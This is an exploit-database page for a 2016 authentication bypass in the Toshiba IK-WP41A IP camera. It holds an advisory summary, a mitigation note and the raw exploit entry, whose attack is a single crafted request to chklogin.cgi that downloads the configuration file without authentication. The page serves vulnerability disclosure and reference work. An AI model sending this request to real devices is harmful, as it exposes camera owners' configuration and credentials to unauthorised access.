header-logo
Suggest Exploit
vendor:
IK-WP41A IP-Camera
by:
Todor Donev
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: IK-WP41A IP-Camera
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

TOSHIBA IK-WP41A IP-Camera auth bypass configuration download

This vulnerability allows an attacker to bypass authentication and download the configuration file of the TOSHIBA IK-WP41A IP-Camera. By sending a specially crafted HTTP request to the chklogin.cgi script, an attacker can download the configuration file without authentication.

Mitigation:

The vendor has released a firmware update to address this vulnerability.
Source

Exploit-DB raw data:

# 
#
#  TOSHIBA IK-WP41A IP-Camera auth bypass configuration download
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
 
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini